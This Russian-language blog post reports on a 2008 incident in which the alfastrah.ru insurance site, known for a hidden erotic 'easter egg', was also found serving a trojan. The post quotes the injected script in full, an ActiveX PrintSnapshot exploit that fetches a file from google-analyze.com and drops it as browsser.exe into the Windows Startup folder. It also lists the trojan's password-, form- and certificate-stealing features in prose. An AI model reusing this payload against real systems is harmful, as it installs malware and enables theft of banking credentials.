• Партнер

  • Два дня назад на сайте alfastrah.ru появилось так называемое «пасхальное
    яйцо» — если кликнуть 5-6 раз на номер телефона в правом верхнем углу в шапке
    сайта начинал играть ролик эротического содержания.

    Не секрет, что вирусный маркетинг ориентирован на очень быстрое
    распространение — заходы на сайт росли по экспоненте. На некоторых форумах
    появились предупреждения о том, что при заходе на сайт Касперский ругается и
    говорит, что на сайте сидит троян. В разговоре с сотрудниками лаборатории
    Касперского эта информация подтвердилась. Таким образом, «вирусный маркетинг»
    обернулся буквально вирусным. Привожу некоторые экспертные комментарии.

    Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус.

    Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус.
    Интересен способ внедрения: он вставлен аккуратно в центр страницы. Грузит вот
    что (скрипт даже не зашифрован): google-analyze.com/counter/index.php.

    HTTP/1.1 200 OK
    Date: Tue, 25 Nov 2008 15:43 GMT
    Server: Apache/2.2.3 (CentOS)
    X-Powered-By: PHP/5.1.6
    Vary: Accept-Encoding,User-Agent
    Content-Length: 475
    Connection: close
    Content-Type: text/html
    <object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>
    <script>
    var arbitrary_file = «google-analyze.com/tracker/load.php»;
    var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe';
    attack.SnapshotPath = arbitrary_file;
    attack.CompressedPath = destination;
    attack.PrintSnapshot(arbitrary_file,destination);
    </script>
    <embed src=«pdf.php» type=«application/pdf» width=100 height=100></embed>

    У вируса есть особенность – блокировка загрузки при повторном посещении –
    вирус попадает на комп только при первой загрузке с какого-нибудь айпишника, при
    повторных уже нет. Так что если смотрят из конторы, где ходят через прокси –
    пострадает только первый посмотревший.
    Для внедрения на сайт была использована незакрытая уязвимость.

    Зверь один-в-один повторяет PoC, опубликованный

    тут
    .

    В функционал бота, помимо стандартных процедур инсталляции себя в систему,
    внедрения в запущенные процессы, борьбы с некоторыми антивирусами,
    предоставления услуг анонимного socks- и http прокси-сервера, входит и мощнейшая
    процедура кражи информации:

    1. Троянец ворует содержимое Protected Storage, в котором содержатся
      пользовательские пароли.
    2. Формграббер. Троянец перехватывает любые отправляемые через браузер
      данные, вводимые в формы. Контролируемые адреса, с которых перехватывается
      информация, — это, как правило, адреса банков и платежных систем. Таким
      образом происходит кража аккаунтов.
    3. Обход виртуальных клавиатур. Троянец перехватывает нажатие кнопки мыши и
      делает скриншот экрана в этот момент.
    4. Подмена сайтов и страничек. Это весьма интересный способ, ранее
      использовавшийся именно в Nuclear Grabber. При попытке пользователя выйти на
      один из сайтов, обращение к которым контролируется троянцем, происходит либо
      редирект запроса на поддельный фишинговый сайт, либо добавление в
      оригинальную страницу сайта нового поля для ввода данных. Содержимое
      страницы подменяется прямо на компьютере пользователя, еще до отображения в
      браузере!
    5. Кража сертификатов.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии